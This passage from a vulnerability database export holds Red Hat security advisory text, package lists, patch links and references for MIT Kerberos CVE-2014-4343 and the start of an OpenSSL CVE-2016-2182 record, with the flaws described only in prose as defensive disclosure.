CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)\n1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)\n1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)\n1184629 - kinit loops on principals on unknown error\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nppc64:\nkrb5-debuginfo-1.12.2-14.el7.ppc.rpm\nkrb5-debuginfo-1.12.2-14.el7.ppc64.rpm\nkrb5-devel-1.12.2-14.el7.ppc.rpm\nkrb5-devel-1.12.2-14.el7.ppc64.rpm\nkrb5-libs-1.12.2-14.el7.ppc.rpm\nkrb5-libs-1.12.2-14.el7.ppc64.rpm\nkrb5-pkinit-1.12.2-14.el7.ppc64.rpm\nkrb5-server-1.12.2-14.el7.ppc64.rpm\nkrb5-server-ldap-1.12.2-14.el7.ppc64.rpm\nkrb5-workstation-1.12.2-14.el7.ppc64.rpm\n\ns390x:\nkrb5-debuginfo-1.12.2-14.el7.s390.rpm\nkrb5-debuginfo-1.12.2-14.el7.s390x.rpm\nkrb5-devel-1.12.2-14.el7.s390.rpm\nkrb5-devel-1.12.2-14.el7.s390x.rpm\nkrb5-libs-1.12.2-14.el7.s390.rpm\nkrb5-libs-1.12.2-14.el7.s390x.rpm\nkrb5-pkinit-1.12.2-14.el7.s390x.rpm\nkrb5-server-1.12.2-14.el7.s390x.rpm\nkrb5-server-ldap-1.12.2-14.el7.s390x.rpm\nkrb5-workstation-1.12.2-14.el7.s390x.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-4341\nhttps://access.redhat.com/security/cve/CVE-2014-4342\nhttps://access.redhat.com/security/cve/CVE-2014-4343\nhttps://access.redhat.com/security/cve/CVE-2014-4344\nhttps://access.redhat.com/security/cve/CVE-2014-4345\nhttps://access.redhat.com/security/cve/CVE-2014-5352\nhttps://access.redhat.com/security/cve/CVE-2014-5353\nhttps://access.redhat.com/security/cve/CVE-2014-9421\nhttps://access.redhat.com/security/cve/CVE-2014-9422\nhttps://access.redhat.com/security/cve/CVE-2014-9423\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi\ngZD8EL2lSaLXnIQxca8zLTg=\n=aK0y\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. \n\nIt was found that if a KDC served multiple realms, certain requests could\ncause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)\n\nThese updated krb5 packages also include several bug fixes. Space precludes\ndocumenting all of these changes in this advisory. Users are directed to\nthe Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the\nReferences section, for information on the most significant of these\nchanges", "sources": [ { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "BID", "id": "69159" }, { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-4343", "trust": 3.3 }, { "db": "SECUNIA", "id": "60082", "trust": 1.7 }, { "db": "SECUNIA", "id": "59102", "trust": 1.7 }, { "db": "BID", "id": "69159", "trust": 1.4 }, { "db": "SECUNIA", "id": "61052", "trust": 1.1 }, { "db": "SECUNIA", "id": "60448", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030706", "trust": 1.1 }, { "db": "OSVDB", "id": "109390", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2014-003818", "trust": 0.8 }, { "db": "SECUNIA", "id": "59499", "trust": 0.6 }, { "db": "SECUNIA", "id": "60645", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201408-251", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2014-4343", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127813", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129774", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130669", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128660", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "BID", "id": "69159" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "id": "VAR-201408-0298", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44448256 }, "last_update_date": "2023-12-18T10:48:55.827000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Fix double-free in SPNEGO [CVE-2014-4343]", "trust": 0.8, "url": "https://github.com/krb5/krb5/commit/f18ddf5d82de0ab7591a36e465bc24225776940f" }, { "title": "RHSA-2015:0439", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "title": "Ticket #7969 Double-free in initiator during SPNEGO renegotiation [CVE-2014-4343]", "trust": 0.8, "url": "http://krbdev.mit.edu/rt/ticket/display.html?id=7969" }, { "title": "krb5-krb5-1.12.2-final", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51700" }, { "title": "krb5-krb5-1.12.2-final", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51699" }, { "title": "Red Hat: CVE-2014-4343", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-4343" }, { "title": "Debian CVElist Bug Report Logs: CVE-2014-4344 in krb5: NULL dereference in GSSAPI servers", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=35d4f3ce5652ab755f81ed48de881600" }, { "title": "Debian Security Advisories: DSA-3000-1 krb5 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=4185a1f803abcb8297ba9b981d24413f" }, { "title": "Debian CVElist Bug Report Logs: CVE-2014-4342 in krb5: insufficient validation processing rfc 1964 tokens", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=289247c77758756a143eb9a839abfd1d" }, { "title": "Debian CVElist Bug Report Logs: CVE-2014-4341 in krb5: insufficient validation processing rfc 1964 tokens", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=4d39c93e60e14a46f4d47ceeb92df9f3" }, { "title": "Debian CVElist Bug Report Logs: CVE-2014-4343 in krb5: double-free in SPNEGO initiators", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9c2c9693f1995e06458de00ef1a741ea" }, { "title": "Debian CVElist Bug Report Logs: CVE-2014-4345 in krb5-kdc-ldap: buffer overrun in kadmind", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5b462e2e6415f47bd0fd28d7421f6993" }, { "title": "Ubuntu Security Notice: krb5 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2310-1" }, { "title": "Amazon Linux AMI: ALAS-2014-443", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-443" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-415", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "NVD", "id": "CVE-2014-4343" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "https://github.com/krb5/krb5/commit/f18ddf5d82de0ab7591a36e465bc24225776940f" }, { "trust": 1.7, "url": "http://krbdev.mit.edu/rt/ticket/display.html?id=7969" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60082" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59102" }, { "trust": 1.4, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1121876" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/nas_advisory1.asc" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201412-53.xml" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "trust": 1.1, "url": "http://www.debian.org/security/2014/dsa-3000" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030706" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/69159" }, { "trust": 1.1, "url": "http://www.osvdb.org/109390" }, { "trust": 1.1, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15553.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61052" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60448" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136360.html" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2014-0345.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95211" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4343" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4343" }, { "trust": 0.6, "url": "http://secunia.com/advisories/59499" }, { "trust": 0.6, "url": "http://secunia.com/advisories/60645" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4345" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4343" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4341" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4344" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4342" }, { "trust": 0.3, "url": "http://web.mit.edu/kerberos/" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15553.html?%20ref=rss" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101004185" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020664" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-4343" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1418" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6800" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/415.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35474" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2310-1/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.8.1+dfsg-2ubuntu0.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.12+dfsg-2ubuntu4.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1416" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.10+dfsg~beta1-2ubuntu0.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1415" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2310-1" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4343" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-5351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4345" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4341" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5351" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4342" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9423" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4341" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4345" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9423" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9422" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4344" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6800.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4345.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4344.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4343.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1418.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.6_technical_notes/krb5.html#rhsa-2014-1389" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4342.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4341.html" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "BID", "id": "69159" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-4343" }, { "db": "BID", "id": "69159" }, { "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4343" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-14T00:00:00", "db": "VULMON", "id": "CVE-2014-4343" }, { "date": "2014-07-22T00:00:00", "db": "BID", "id": "69159" }, { "date": "2014-08-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "date": "2014-08-11T13:33:00", "db": "PACKETSTORM", "id": "127813" }, { "date": "2014-08-11T18:24:00", "db": "PACKETSTORM", "id": "127825" }, { "date": "2014-12-31T12:12:00", "db": "PACKETSTORM", "id": "129774" }, { "date": "2015-03-05T21:51:51", "db": "PACKETSTORM", "id": "130669" }, { "date": "2014-10-14T23:04:48", "db": "PACKETSTORM", "id": "128660" }, { "date": "2014-08-14T05:01:49.897000", "db": "NVD", "id": "CVE-2014-4343" }, { "date": "2014-08-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-01-21T00:00:00", "db": "VULMON", "id": "CVE-2014-4343" }, { "date": "2015-05-07T17:32:00", "db": "BID", "id": "69159" }, { "date": "2015-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003818" }, { "date": "2020-01-21T15:46:47.197000", "db": "NVD", "id": "CVE-2014-4343" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-251" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "CNNVD", "id": "CNNVD-201408-251" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Initiator init_ctx_reselect Function double memory vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003818" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-251" } ], "trust": 0.6 } }
var-201609-0595
Vulnerability from variot
The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors. ( Out-of-bounds writes and application crashes ) There are vulnerabilities that are subject to unspecified impact, such as being put into a state. Supplementary information : CWE Vulnerability type by CWE-787: Out-of-bounds Write ( Out-of-bounds writing ) Has been identified. http://cwe.mitre.org/data/definitions/787.htmlService disruption by a third party ( Out-of-bounds writes and application crashes ) There is a possibility of being affected unspecified, such as being in a state. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the affected application, resulting in denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio() 1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec() 1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection 1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32) 1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer 1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks 1377594 - CVE-2016-6306 openssl: certificate message OOB reads 1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.3.src.rpm
i386: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.3.i686.rpm openssl-1.0.1e-48.el6_8.3.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
